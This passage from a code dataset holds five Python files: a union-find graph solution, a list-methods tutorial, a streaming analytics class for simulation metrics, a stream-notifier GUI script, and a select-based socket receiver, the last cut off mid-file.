+{"seq_id":"518828076","text":"class Solution:\n # @param A : integer\n # @param B : list of list of integers\n # @return a list of integers\n def find(self, u, parent):\n if parent[u] == u:\n return u\n par = self.find(parent[u], parent)\n parent[u] = par\n return par\n\n def union(self, u, v, parent, height):\n C = self.find(u, parent)\n D = self.find(v, parent)\n if C == D:\n return\n if height[C] > height[D]:\n parent[D] = C\n elif height[D] > height[C]:\n parent[C] = D\n else:\n height[C] += 1\n parent[D] = C\n\n def solve(self, A, B):\n height = [1] * (A + 1)\n parent = list(range(A + 1))\n ans = []\n for i in range(len(B)):\n type, u, v = B[i]\n if type == 0:\n self.union(u, v, parent, height)\n else:\n C = self.find(u, parent)\n D = self.find(v, parent)\n if C == D:\n ans.append(1)\n else:\n ans.append(0)\n return ans\n\n","sub_path":"Graph/road_inspection.py","file_name":"road_inspection.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"382207757","text":"\"\"\"Методы работы со списками\"\"\"\nA = []\nx = 10\nA.append(x) # Метод класса list, добавляет элемент в конец\nn = len(A) # Узнать длину списка\nx = A.pop() # Возвращает последний элемент и вытаскивает его из массива\n\n# Генераторы списков\nA = []\nfor x in range(10):\n A.append(x**2)\nprint(A)\n\nA = [x**2 for x in range(10)]\nprint(A)\n\n# Создать список из квадрратов четных элементов другого списка\nA = [1, 2, 3, 4, 5, 7, 12, 9, 6]\nB = []\nfor x in A:\n if x % 2 == 0:\n B.append(x**2)\n\nprint(A)\nprint(B)\n\nB = [x**2 for x in A if x % 2 == 0]\nprint(B)\n","sub_path":"MIPT_alg_struct/lect6/lists_methods.py","file_name":"lists_methods.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"145019693","text":"import pandas as pd\nimport numpy as np\nimport time\nfrom collections import defaultdict\n\n# Change point detection\nfrom ipca_aff_cpd import IPCAAFFCPD\n\n# Progressive incremental PCA \nfrom prog_inc_pca import ProgIncPCA\n\n# Progressive K-means Clustering\nfrom prog_kmeans import ProgKMeans\n\n# Progressive Causality\nfrom prog_causality import ProgCausality\n\nclass StreamDataAnalytics:\n def __init__(self, data, granularity, cluster_metric, calc_metrics, causality_metrics, communication_metrics, time_domain, this_metric):\n self.count = 0\n self.granularity = granularity\n self.time_domain = time_domain\n self.communication_metrics = communication_metrics\n self.calc_metrics = calc_metrics\n self.causality_metrics = causality_metrics\n self.cluster_metric = cluster_metric\n self.this_metric = this_metric\n\n self.df = pd.DataFrame(data)\n self.df['RbPrim'] = self.df['RbTotal'] - self.df['RbSec']\n self.incoming_df = self.df\n self.new_data_df = self.df\n\n self.pe_count = len(self.df['Peid'].unique())\n self.kp_count = len(self.df['Kpid'].unique())\n \n self.metric_df = self.preprocess(self.df)\n # set new_data_df for the first stream as metric_df\n self.whole_data_df = self.metric_df\n \n # If granularity is KP, send both Kp and Pe data. \n if(self.granularity == 'Kpid'):\n self.communication_metrics.append(self.granularity)\n self.communication_metrics.append('Peid')\n else:\n self.communication_metrics.append(self.granularity)\n\n self.algo_clustering = 'kmeans'\n\n self.cpd = CPD()\n self.pca = PCA()\n self.causal = Causal()\n self.clustering = Clustering()\n self.results = pd.DataFrame(data=self.df[granularity].astype(np.float64).tolist(), columns=[granularity])\n self._time = self.metric_df.columns.get_level_values(1).tolist()\n self.granIDs = self.df[self.granularity]\n \n def schema(self):\n schema = {k:self.process_type(type(v).__name__) for k,v in self.df.iloc[0].items()}\n return (self.results.to_dict('records'), schema)\n\n # Enforce python data types when numpy data types are used.\n # This is mainly done because JSON format does not work with numpy's data types.\n def process_type(self, type):\n if(type == 'int64'):\n return 'int'\n if(type == 'float64'):\n return 'float'\n if(type == 'list'):\n return 'int'\n\n # Return the current KP matrix. \n def kp_matrix(self):\n ret = np.zeros([self.incoming_df.shape[0], self.incoming_df.shape[0]])\n for idx, row in self.incoming_df.iterrows():\n ret[idx] = row['CommData']\n return ret\n \n def comm_data(self):\n if(self.granularity == 'KpGid'):\n self.communication_metrics.append('Peid')\n self.communication_metrics.append('Kpid')\n\n # Remove unnecessary columns from df\n df = self.incoming_df[self.communication_metrics]\n \n # columns get duplicated somehow. 
Not sure why?\n df = df.loc[:,~df.columns.duplicated()]\n\n # Group by Pe to Pe level data.\n group_df = df.groupby(['Peid'])\n\n # Number of PEs = number of groups\n pe_count = group_df.ngroups\n\n min_pe_comm = 0\n max_pe_comm = 0\n pe_comm_arr = []\n # Loop through each key.\n for key, group in group_df:\n pe_df = group_df.get_group(key)\n\n # Get the required information.\n comm_data_series = pe_df['CommData']\n kpid = pe_df['Kpid']\n peid = pe_df['Peid'].unique()[0]\n \n # Calculate the inter communication between the PEs.\n mean_comm = []\n for idx, row in enumerate(comm_data_series):\n kp_mean_comm = []\n for i in range(0, pe_count):\n pe_comm = row[i*self.kp_count: (i+1)*self.kp_count]\n mean_pe_comm = np.sum(np.array(pe_comm), axis=0)\n kp_mean_comm.append(mean_pe_comm)\n mean_comm.append(kp_mean_comm)\n \n # Calculate the mean across all KPs\n pe_comm_np = np.mean(np.array(mean_comm).T, axis=1)\n pe_comm_list = pe_comm_np.tolist()\n min_pe_comm = min(min_pe_comm, np.min(pe_comm_np))\n max_pe_comm = max(max_pe_comm, np.max(pe_comm_np))\n pe_comm_arr.append(pe_comm_list)\n\n ret_df = self.incoming_df[self.communication_metrics]\n schema = {k:self.process_type(type(v).__name__) for k,v in ret_df.iloc[0].items()}\n return {\n \"kp_comm\": ret_df.to_dict('records'),\n \"pe_comm\": pe_comm_arr,\n \"kp_count\": self.kp_count,\n \"pe_count\": self.pe_count,\n \"min_comm\": min_pe_comm,\n \"max_comm\": max_pe_comm,\n \"schema\": schema\n }\n \n def comm_df_time(self, df, time):\n # Drop columns we dont need.\n df = self.df[self.communication_metrics]\n\n # columns get duplicated somehow. Not sure why?\n df = df.loc[:,~df.columns.duplicated()]\n\n # Get the rows with self.time_domain == time. \n time1 = time - 100.0\n time2 = time + 100.0\n # print(\"Times: {0}, {1}\", time1, time2)\n df = df.loc[df[self.time_domain].between(time1, time2) == True]\n\n # print(\"df info: {1} shape {0}, \".format(df.shape, df[self.time_domain].unique()))\n return df\n\n ################################################\n # PE and KP communication for normal Comm data.\n ################################################\n def comm_df_to_pe_matrix(self, df, group_by):\n group_df = df.groupby([group_by])\n\n min_pe_comm = 0\n max_pe_comm = 0\n pe_comm_arr = []\n # Loop through each key.\n for key, group in group_df:\n # Group the df. \n pe_df = group_df.get_group(key)\n\n # Get the required information.\n comm_data_series = pe_df['CommData']\n kpid = pe_df['Kpid']\n peid = pe_df['Peid'].unique()[0]\n\n # Calculate the inter communication between the PEs.\n mean_comm = []\n for idx, row in enumerate(comm_data_series):\n kp_mean_comm = []\n for i in range(0, self.pe_count):\n pe_comm = row[i*self.kp_count: (i+1)*self.kp_count]\n mean_pe_comm = np.sum(np.array(pe_comm), axis=0)\n kp_mean_comm.append(mean_pe_comm)\n mean_comm.append(kp_mean_comm)\n \n # Calculate the mean across all KPs\n pe_comm_np = np.mean(np.array(mean_comm).T, axis=1)\n pe_comm_list = pe_comm_np.tolist()\n min_pe_comm = min(min_pe_comm, np.min(pe_comm_np))\n max_pe_comm = max(max_pe_comm, np.max(pe_comm_np))\n pe_comm_arr.append(pe_comm_list)\n return [pe_comm_arr, min_pe_comm, max_pe_comm]\n\n def comm_df_to_kp_matrix(self, df, group_by):\n group_df = df.groupby([group_by])\n\n # create the matrix we need to send. 
\n number_of_pes = self.pe_count*self.kp_count\n kp_comm_matrix_shape = (number_of_pes, number_of_pes)\n kp_comm_matrix = np.zeros(shape=kp_comm_matrix_shape)\n \n # Loop through the communication at each sampled timepoint.\n for key, item in group_df:\n key_df = group_df.get_group(key)\n\n number_of_times = len(key_df[self.time_domain].unique())\n kp_comm_time_matrix_shape = (number_of_times, number_of_pes)\n\n kp_matrix = np.zeros(shape=kp_comm_time_matrix_shape)\n for idx, row in key_df.iterrows():\n # Get index of this sample. \n peid = row['Peid']\n kpid = row['Kpid']\n index = peid*self.kp_count + kpid\n\n kp_time_group_df = key_df.groupby([self.time_domain])\n\n time_idx = 0\n for time, time_item in kp_time_group_df:\n time_df = kp_time_group_df.get_group(time)\n kp_matrix[time_idx] = time_df['CommData'].tolist()[0]\n time_idx += 1\n \n # Sum the matrices we got. \n kp_matrix_sum = kp_matrix.sum(axis = 0)\n \n # For average of the runtimes use this. \n # kp_matrix_avg = np.divide(kp_matrix_sum, number_of_pes)\n \n kp_comm_matrix[index] = kp_matrix_sum\n \n return kp_comm_matrix\n\n ########################################################\n # Base communication\n ########################################################\n def comm_data_base(self, time):\n if time == None:\n time = self.incoming_df[self.time_domain].unique()[0]\n\n # Append both KpId and PeId when analysing at KP granularity. \n if(self.granularity == 'KpGid'):\n self.communication_metrics.append('Peid')\n self.communication_metrics.append('Kpid')\n\n df_time = self.comm_df_time(self.df, time)\n df_time = df_time.sort_values(['KpGid'])\n pe_matrix_results = self.comm_df_to_pe_matrix(df_time, 'Peid')\n kp_matrix = self.comm_df_to_kp_matrix(df_time, 'KpGid') \n return {\n 'data': df_time.to_dict('records'),\n \"kp_comm\": kp_matrix.tolist(),\n \"pe_comm\": pe_matrix_results[0],\n \"kp_count\": self.kp_count,\n \"pe_count\": self.pe_count,\n \"min_comm\": pe_matrix_results[1],\n \"max_comm\": pe_matrix_results[2],\n }\n\n ########################################################\n # Interval communication\n ########################################################\n def comm_data_interval(self, interval):\n if(self.granularity == 'KpGid'):\n self.communication_metrics.append('Peid')\n self.communication_metrics.append('Kpid')\n\n # Drop columns we dont need.\n df = self.df[self.communication_metrics]\n \n # columns get duplicated somehow. Not sure why?\n df = df.loc[:,~df.columns.duplicated()]\n\n # Filter between the time ranges\n filter_df = df.loc[df[self.time_domain].between(interval[0], interval[1]) == True]\n \n # Remove duplicated columns. Not sure why this happens.\n filter_df = filter_df.loc[:,~filter_df.columns.duplicated()]\n\n # Find number of Kps in the run.\n pe_count = len(self.df['Peid'].unique())\n kp_count = len(self.df['Kpid'].unique())\n \n # Group by the KpGid\n # group_df = filter_df.groupby(['Peid', 'Kpid'])\n group_df = filter_df.groupby(['KpGid'])\n unique_ids = filter_df[self.granularity].unique()\n \n # Drop columns in the return df\n # kp_comm_df = self.incoming_df[self.communication_metrics]\n \n # create the matrix we need to send. 
\n number_of_pes = pe_count*kp_count\n kp_comm_matrix_shape = (number_of_pes, number_of_pes)\n kp_comm_matrix = np.zeros(shape=kp_comm_matrix_shape)\n \n # Loop through the communication at each sampled timepoint.\n for key, item in group_df:\n key_df = group_df.get_group(key)\n\n number_of_times = len(key_df[self.time_domain].unique())\n kp_comm_time_matrix_shape = (number_of_times, number_of_pes)\n\n kp_matrix = np.zeros(shape=kp_comm_time_matrix_shape)\n for idx, row in key_df.iterrows():\n # Get index of this sample. \n peid = row['Peid']\n kpid = row['Kpid']\n index = peid*kp_count + kpid\n\n kp_time_group_df = key_df.groupby([self.time_domain])\n\n time_idx = 0\n for time, time_item in kp_time_group_df:\n time_df = kp_time_group_df.get_group(time)\n kp_matrix[time_idx] = time_df['CommData'].tolist()[0]\n time_idx += 1\n \n # Sum the matrices we got. \n kp_matrix_sum = kp_matrix.sum(axis = 0)\n\n # For average of the runtimes use this. \n kp_matrix_avg = np.divide(kp_matrix_sum, number_of_times)\n \n kp_comm_matrix[index] = kp_matrix_avg\n\n ### PE level communication ###\n\n # Group by Pe to Pe level data.\n group_df = filter_df.groupby(['Peid'])\n\n # Number of PEs = number of groups\n pe_count = group_df.ngroups\n\n max_pe_comm = 0\n min_pe_comm = 0\n pe_comm_matrix = []\n # Loop through each key.\n for key, group in group_df:\n pe_df = group_df.get_group(key)\n\n pe_matrix_shape = (number_of_times, number_of_pes, number_of_pes)\n\n pe_matrix = np.zeros(shape = pe_matrix_shape)\n pe_time_group_df = pe_df.groupby([self.time_domain])\n\n time_idx = 0\n for time, time_item in pe_time_group_df:\n time_df = pe_time_group_df.get_group(time)\n for time_df_idx, time_df_row in time_df.iterrows():\n kpGid = time_df_row['KpGid']\n pe_matrix[time_idx][kpGid] = time_df_row['CommData']\n time_idx += 1\n\n pe_matrix_sum = pe_matrix.sum(axis = 0)\n\n pe_matrix_avg = np.divide(pe_matrix_sum, number_of_times)\n\n # Get the required information.\n comm_data_series = pe_matrix_sum\n\n kpid = pe_df['Kpid']\n peid = pe_df['Peid'].unique()[0]\n \n # Get number of KPs.\n kp_count = len(pe_df['Kpid'].unique())\n\n # Calculate the inter communication between the PEs.\n mean_comm = []\n for idx, row in enumerate(comm_data_series):\n kp_mean_comm = []\n for i in range(0, pe_count):\n pe_comm = row[i*kp_count: (i+1)*kp_count]\n mean_pe_comm = np.sum(np.array(pe_comm), axis=0)\n kp_mean_comm.append(mean_pe_comm)\n mean_comm.append(kp_mean_comm)\n \n # Calculate the mean across all KPs\n pe_comm_np = np.mean(np.array(mean_comm), axis=0)\n\n # Set maximum communication\n max_pe_comm = max(max_pe_comm, np.max(pe_comm_np))\n\n # Set minimum communication\n min_pe_comm = min(min_pe_comm, np.min(pe_comm_np))\n\n pe_comm_list = pe_comm_np.tolist()\n pe_comm_matrix.append(pe_comm_list)\n \n ret_df = self.incoming_df[self.communication_metrics]\n schema = {k:self.process_type(type(v).__name__) for k,v in ret_df.iloc[0].items()}\n result = {\n \"data\": ret_df.to_dict('records'), \n \"aggr_kp_comm\": kp_comm_matrix.tolist(),\n \"aggr_pe_comm\": pe_comm_matrix,\n \"kp_count\": kp_count,\n \"pe_count\": pe_count,\n 'max_comm': max_pe_comm,\n 'min_comm': min_pe_comm,\n \"schema\": schema\n }\n\n return result\n\n # Generic groupby a keys. 
\n def groupby(self, df, keys, metric = 'mean'):\n # Groups data by the keys provided\n self.groups = df.groupby(keys)\n measure = getattr(self.groups, metric)\n self.data = measure() \n\n # Process (Group the data) for all cluster_metrics\n def preprocess(self, df):\n # Group the data by granularity (PE, KP, LP) and time. \n # Converts into a table and the shape is (number of processing elements, number of time steps)\n self.groupby(df, [self.granularity, self.time_domain])\n table = pd.pivot_table(df, values=[self.this_metric], index=[self.granularity], columns=[self.time_domain])\n self.current_time = table.columns\n return table\n\n # Process (Group the data) only for a specific metric. \n def processByMetric(self, df, metric):\n self.groupby(df, [self.granularity, self.time_domain])\n table = pd.pivot_table(df, values=[metric], index=[self.granularity], columns=[self.time_domain], fill_value=0)\n column_names = []\n for name, group in self.groups:\n column_names.append(name[1])\n table.columns = list(set(column_names))\n return table\n\n def drop_prev_results(self, attrs): \n self.results.drop(attrs, axis=1, inplace=True)\n \n # Update in the data.\n def update(self, new_data):\n self.whole_data_df = pd.DataFrame(new_data)\n self.whole_data_df['RbPrim'] = self.whole_data_df['RbTotal'] - self.whole_data_df['RbSec'] \n self.incoming_df = self.whole_data_df\n self.df = pd.concat([self.df, self.whole_data_df]) \n self.new_data_df = self.preprocess(self.whole_data_df)\n # To avoid Nan values while concat\n self.metric_df.reset_index(drop=True, inplace=True)\n self.new_data_df.reset_index(drop=True, inplace=True)\n self.metric_df = pd.concat([self.metric_df, self.new_data_df], axis=1).T.drop_duplicates().T\n self.count = self.count + 1\n self._time = self.metric_df.columns.get_level_values(1).tolist()\n self.granIDs = self.df[self.granularity]\n return self \n\n # Method to remove the data on request.\n # not sure if it works like it needs to be. \n def deupdate(self, remove_data):\n self.whole_data_df = pd.DataFrame(remove_data)\n this_time = self.whole_data_df[self.time_domain].unique()[0]\n self.df = self.df[self.df[self.time_domain] != this_time]\n self.count = self.count - 1\n self._time = this_time\n self.granIDs = self.df[self.granularity] \n return self\n\n # Clear the results. \n def clean_up(self):\n if(self.count > 2):\n self.drop_prev_results(['cpd'])\n self.drop_prev_results(['from_metrics','from_causality','from_IR_1', 'from_VD_1',\n 'to_metrics', 'to_causality', 'to_IR_1', 'to_VD_1'\n ])\n self.drop_prev_results(['PC0','PC1'])\n if(self.algo_clustering == 'evostream'):\n self.drop_prev_results(['ids', 'normal', 'normal_clusters', 'normal_times','micro', 'micro_clusters', 'macro', 'macro_clusters', 'macro_times', 'micro_times'])\n elif(self.algo_clustering == 'kmeans'):\n self.drop_prev_results(['ids', 'normal', 'normal_clusters', 'normal_times', 'macro', 'macro_clusters', 'macro_times',])\n\n # Main run method that triggers the analysis. 
\n def run(self, data, algo):\n self.clean_up()\n clustering_result = self.clustering.tick(data)\n pca_result = self.pca.tick(data, algo['pca'])\n cpd_result = self.cpd.tick(data, algo['cpd'])\n causal_result = self.causal.tick(data, algo['causality'])\n \n if(self.count >= 2):\n self.results = self.results.join(clustering_result)\n self.results = self.results.join(pca_result)\n self.results = self.results.join(cpd_result)\n self.results = self.results.join(causal_result)\n self.results = self.results.fillna(0) \n return self.schema()\n\n # Write the metric_df to a csv file\n def to_csv(self, filename, metric):\n self.results.to_csv(str(filename) + str(self.cluster_metric) + '.csv')\n\n # Read from csv file. \n def from_csv(self, filename, metric):\n self.results = pd.read_csv(str(filename) + str(self.cluster_metric) + '.csv')\n return self.schema()\n\n# Class to perform change point detection for streaming data.\nclass CPD(StreamDataAnalytics):\n # Stores the change points recorded.\n def __init__(self):\n self.cps = []\n self.alpha = 0.1\n self.aff_obj = IPCAAFFCPD(alpha=self.alpha)\n\n # Return data's schema.\n def schema(self, result, count):\n cpd = [(result)]\n cpd_result = pd.DataFrame(cpd, columns=['cpd'])\n return cpd_result\n\n # Tick is the procedure that gets executed when there is new data.\n def tick(self, data, method):\n ret = False\n self.new_data_df = data.new_data_df\n self.count = data.count\n self.current_time = data.current_time\n self.method = method\n if(self.count == 1):\n if(self.method == 'aff'):\n result = self.aff()\n else:\n if(self.method == 'aff'):\n result = self.aff_update()\n return self.schema(result, self.count)\n\n # Getter to return the change points.\n def get_change_points(self):\n return self.cps\n \n # perform adaptive forgetting factor CPD\n def aff(self):\n X = np.array(self.new_data_df)\n Xt = X.transpose()\n \n change = self.aff_obj.feed_predict(Xt[0, :])\n if change:\n self.cps.append(0)\n print('Change', 0)\n return 1\n else:\n return 0\n \n # Progressive update using adaptive forgetting factor. \n def aff_update(self):\n X = np.array(self.new_data_df[self.current_time])\n Xt = X.transpose()\n change = self.aff_obj.feed_predict(Xt[0, :])\n if(change):\n self.cps.append(self.count)\n print('Change', self.count)\n return 1\n else:\n # print('No-change#######################', self.count)\n return 0\n\n# Class to perform progressive PCA.\nclass PCA(StreamDataAnalytics):\n def __init__(self):\n self.n_components = 2\n self.time_series = np.array([])\n self.pcs_curr = np.array([])\n self.pcs_new = np.array([]) \n self.pcs_curr_bg = np.array([])\n\n # Controls the schema to return the data.\n def schema(self):\n return pd.DataFrame(data = self.pcs_curr, columns = ['PC%d' %x for x in range(0, self.n_components)])\n\n # Tick is the procedure that gets executed when there is new data.\n def tick(self, data, method):\n self.metric_df = data.metric_df\n self.new_data_df = data.new_data_df\n self.method = method\n self.count = data.count\n\n if(self.count < 2):\n pass\n elif(self.count == 2):\n if(method == 'prog_inc'):\n self.prog_inc()\n return self.schema()\n else:\n if(self.method == 'prog_inc'):\n self.prog_inc_update()\n return self.schema()\n \n # Performs progressive incremental PCA. 
\n def prog_inc(self):\n pca = ProgIncPCA(2, 1.0)\n self.time_series = self.metric_df.values\n pca.progressive_fit(self.time_series, 10, \"random\")\n self.pcs_curr = pca.transform(self.time_series) \n pca.get_loadings()\n\n # Performs update on data for progressive incremental PCA. \n def prog_inc_update(self):\n new_time_series = self.new_data_df.values\n self.time_series = np.append(self.time_series, new_time_series, 1)\n pca = ProgIncPCA(2, 1.0)\n pca.progressive_fit(self.time_series, latency_limit_in_msec = 10)\n self.pcs_new = pca.transform(self.time_series)\n self.pcs_curr = ProgIncPCA.geom_trans(self.pcs_curr, self.pcs_new)\n\n\n# Class to perform Progressive clustering. \nclass Clustering(StreamDataAnalytics):\n def __init__(self):\n self.n_clusters = 3\n self.mutation_rate = 0.1\n self.fit_latency_limit_in_msec = 10\n self.refine_latency_limit_in_msec = 30\n self.labels = np.array([])\n self.labels_macro = np.array([])\n self.labels_micro = np.array([])\n self.times_macro = np.array([])\n self.times_micro = np.array([])\n\n # Format for kmeans streaming. \n def schema(self):\n normal = [(self.time_series.tolist(), self.labels, self._time, self.granIDs.tolist())]\n macro = [(self.time_series_macro.tolist(), self.labels_macro, self._time)]\n normal_result = pd.DataFrame(data=normal, columns=['normal', 'normal_clusters', 'normal_times', 'ids'])\n macro_result = pd.DataFrame(data=macro, columns=['macro', 'macro_clusters', 'macro_times'])\n return [normal_result, macro_result]\n\n # Main procedure to control data updates. \n def tick(self, data):\n self.metric_df = data.metric_df\n self.new_data_df = data.new_data_df\n self.algo = data.algo_clustering\n self._time = data._time\n self.granIDs = data.granIDs\n self.granularity = data.granularity\n self.count = data.count \n\n if(self.algo == 'kmeans'):\n if(self.count < 2):\n return {}\n if(self.count == 2):\n self.kmeans()\n elif(self.count > 2):\n self.kmeans_update()\n self.kmeans_macro()\n return self.schema()\n\n def emptyCurrentToPrev(self):\n ret = {}\n for idx in range(self.n_clusters):\n ret[idx] = 0\n return ret\n\n # Main procedure to perform kmeans progressive. \n def kmeans(self):\n self.time_series = self.metric_df.values\n self.evo = ProgKMeans(n_clusters=self.n_clusters)\n self.evo.progressive_fit(self.time_series, latency_limit_in_msec=self.fit_latency_limit_in_msec)\n self.labels = self.evo.predict(self.time_series).tolist()\n self.current_to_prev = self.emptyCurrentToPrev()\n\n # When there is new data, this function is triggered. \n def kmeans_update(self):\n new_time_series = self.new_data_df.values\n self.time_series = np.append(self.time_series, new_time_series, 1)\n self.evo.progressive_fit(self.time_series, latency_limit_in_msec=self.fit_latency_limit_in_msec, point_choice_method=\"fromPrevCluster\", verbose=True)\n self.labels, self.current_to_prev = self.evo.consistent_labels(self.labels, self.evo.predict(self.time_series))\n\n # Calculate the macro clustering from PCA. \n def kmeans_macro(self):\n self.time_series_macro = np.array(self.evo.get_centers())\n self.labels_macro = [self.current_to_prev[i] for i in range(self.time_series_macro.shape[0])]\n self.times_macro = np.array(self._time)\n\n# Class to perform causality analysis. \nclass Causal(StreamDataAnalytics):\n def __init__(self):\n self.pivot_table_results = {}\n\n # Convert numpy bool format to bool. 
\n def numpybool_to_bool(self, arr):\n ret = []\n for idx, val in enumerate(arr):\n if(val == True):\n ret.append(1)\n elif(val == False):\n ret.append(0)\n else:\n ret.append(-1)\n return ret\n\n # Flatten a list\n def flatten(self, l):\n flat_list = []\n for sublist in l:\n for item in sublist:\n flat_list.append(item)\n return flat_list\n\n # Main procedure to control when data updates occur. \n def tick(self, data, method):\n self.df = data.whole_data_df\n self.incoming_df = data.incoming_df\n self.cluster_metric = data.cluster_metric\n self.time_domain = data.time_domain\n self.granularity = data.granularity\n self.causality_metrics = data.causality_metrics\n \n self.data_metrics = ['NetworkRecv', 'NetworkSend', 'NeventProcessed', 'RbSec', 'NeventRb', 'RbTotal', 'RbPrim', 'NetReadTime', 'FcAttempts', 'EventTies', 'EventProcTime']\n self.calc_metrics = ['NetworkRecv', 'NetworkSend', 'NeventProcessed', 'RbSec', 'NeventRb', 'RbTotal', 'RbPrim', 'NetReadTime', 'FcAttempts', 'EventTies', 'EventProcTime']\n\n self.data_metrics.append(self.granularity)\n self.data_metrics.append(self.time_domain)\n\n pca = ProgIncPCA(1)\n total_latency_for_pca = 100\n latency_for_each = int(total_latency_for_pca / len(self.data_metrics))\n n = self.incoming_df.shape[0]\n X = np.empty(shape=(n, len(self.data_metrics)))\n self.df = self.df[self.data_metrics] \n\n for i, metric in enumerate(self.calc_metrics):\n start = time.time()\n metric_pd = data.processByMetric(self.df, metric)\n if(metric not in self.pivot_table_results):\n self.pivot_table_results[metric] = metric_pd\n else:\n self.pivot_table_results[metric] = pd.concat([self.pivot_table_results[metric], metric_pd], axis=1)\n metric_pd = self.pivot_table_results[metric]\n metric_nd = metric_pd.values\n \n pca.progressive_fit(\n metric_nd,\n latency_limit_in_msec=latency_for_each,\n point_choice_method='random',\n verbose=False)\n metric_1d = pca.transform(metric_nd)\n X[:, i] = metric_1d[:, 0]\n\n X = pd.DataFrame(X, columns=self.data_metrics)\n X = X[self.causality_metrics]\n is_non_const_col = (X != X.iloc[0]).any()\n X = X.loc[:, is_non_const_col]\n X = X.replace([np.inf, -np.inf], np.nan)\n X = X.fillna(0.0)\n\n causality_from = pd.DataFrame(\n index=[0], columns=self.causality_metrics).fillna(False)\n causality_to = pd.DataFrame(\n index=[0], columns=self.causality_metrics).fillna(False)\n\n ir_from = pd.DataFrame(index=[0], columns=self.causality_metrics).fillna(0.0)\n ir_to = pd.DataFrame(index=[0], columns=self.causality_metrics).fillna(0.0)\n\n vd_from = pd.DataFrame(index=[0], columns=self.causality_metrics).fillna(0.0)\n vd_to = pd.DataFrame(index=[0], columns=self.causality_metrics).fillna(0.0)\n\n if is_non_const_col.loc[self.cluster_metric]:\n causality = ProgCausality()\n causality.adaptive_progresive_var_fit(\n X, latency_limit_in_msec=100, point_choice_method=\"reverse\")\n\n causality_from, causality_to = causality.check_causality(self.cluster_metric, signif=0.1)\n\n try:\n tmp_ir_from, tmp_ir_to = causality.impulse_response(\n self.cluster_metric)\n ir_from.loc[0, is_non_const_col] = tmp_ir_from[:, 1]\n ir_to.loc[0, is_non_const_col] = tmp_ir_to[:, 1]\n except:\n b = 1\n \n try:\n tmp_vd_from, tmp_vd_to = causality.variance_decomp(self.cluster_metric)\n vd_from.loc[0, is_non_const_col] = tmp_vd_from[:, 1]\n vd_to.loc[0, is_non_const_col] = tmp_vd_to[:, 1]\n except:\n a = 1\n \n causality_from = causality_from\n causality_to = causality_to\n ir_from = ir_from.loc[0, :].tolist()\n ir_to = ir_to.loc[0, :].tolist()\n vd_from = 
vd_from.loc[0, :].tolist()\n vd_to = vd_to.loc[0, :].tolist()\n\n \n from_ = [(self.causality_metrics, self.numpybool_to_bool(causality_from),\n ir_from, vd_from)]\n to_ = [(self.causality_metrics, self.numpybool_to_bool(causality_to), ir_to,\n vd_to)]\n \n from_result = pd.DataFrame(\n data=from_,\n columns=[\n 'from_metrics', 'from_causality', 'from_IR_1', 'from_VD_1'\n ])\n to_result = pd.DataFrame(\n data=to_,\n columns=['to_metrics', 'to_causality', 'to_IR_1', 'to_VD_1'])\n\n return [from_result, to_result]","sub_path":"server/ross_vis/StreamAnalysis.py","file_name":"StreamAnalysis.py","file_ext":"py","file_size_in_byte":31281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"402760391","text":"import requests\r\nimport sys\r\nfrom PyQt4 import QtGui, QtCore\r\nfrom PyQt4.QtCore import pyqtSlot\r\nfrom PyQt4.QtGui import *\r\nfrom PyQt4.QtGui import QInputDialog, QLineEdit\r\nfrom subprocess import Popen\r\nimport time\r\nimport smtplib\r\nimport webbrowser\r\nfrom pynput.keyboard import Key, Controller\r\n\r\nmel = \"https://chaturbate.com/projektmelody/\"\r\nkeyboard = Controller()\r\nwhile True:\r\n url = requests.get(mel)\r\n\r\n if \"Room is currently offline\" in url.text:\r\n print(\"I miss melody....\")\r\n time.sleep(60)\r\n continue\r\n \r\n if True:\r\n keyboard.press(Key.alt)\r\n keyboard.press(Key.f4)\r\n keyboard.release(Key.alt)\r\n keyboard.release(Key.alt)\r\n \r\n class Window(QtGui.QMainWindow):\r\n\r\n def __init__(self):\r\n super(Window, self).__init__()\r\n self.setGeometry(400, 125, 1000, 750)\r\n self.setWindowTitle(\"ProjektMelody\")\r\n self.setWindowIcon(QtGui.QIcon('pythonlogo.png'))\r\n \r\n\r\n self.home()\r\n\r\n def home(self):\r\n btn = QtGui.QPushButton(\"Melody is Streaming!\", self)\r\n btn.clicked.connect(self.close_application)\r\n btn.resize(btn.minimumSizeHint())\r\n btn.setGeometry(235,135 , 500, 450)\r\n\r\n extractAction = QtGui.QAction(QtGui.QIcon('Melody.png'), 'Flee the Scene', self)\r\n extractAction.triggered.connect(self.close_application)\r\n \r\n \r\n self.show()\r\n\r\n def close_application(self):\r\n choice = QtGui.QMessageBox.question(self, 'Waifu Alert',\r\n \"Watch Stream?\",\r\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)\r\n if choice == QtGui.QMessageBox.Yes:\r\n webbrowser.open_new(mel)\r\n sys.exit()\r\n else:\r\n pass\r\n\r\n \r\n def run():\r\n app = QtGui.QApplication(sys.argv)\r\n GUI = Window()\r\n sys.exit(app.exec_())\r\n\r\n\r\n run()\r\n \r\n print(\"Stream time!\")\r\n break\r\n","sub_path":"melody_beta.py","file_name":"melody_beta.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"353500762","text":"import socket\nimport select\n\nfrom typing import Tuple\n\n\ndef main() -> None:\n print(\"RECEIVER START\")\n\n print(\"bind receiver ...\")\n receiver = socket.socket(\n socket.AF_INET, # socket family\n socket.SOCK_STREAM, # socket type\n )\n\n HOST = \"0.0.0.0\"\n PORT = 5678\n receiver.bind((HOST, PORT,))\n receiver.listen()\n\n try:\n # wait for a connection\n while True:\n print(\"wait for accept ...\")\n sender_conn: socket.socket\n addr: Tuple[str, int]\n (sender_conn, addr,) = receiver.accept()\n print(f\"accepted! ({addr})\")\n\n # get messages from the connection\n while True:\n # --- IMPORTANT BIT ----\n print(\"Select ...\")\n (\n to_read, to_write, to_err\n ) = select.select([sender_conn], [], [sender_conn])\n\n msg = sender_conn.recv(1024)\n print(\"RECV\", msg)\n\n # if there are 0 bytes received\n # then the remote socket closed\n if len(msg) == 0:\n print(\"Client closed. Cleaning ...\")\n sender_conn.close()\n break\n\n except KeyboardInterrupt:\n print(\"\\nCtrl+C detected\")\n finally:\n 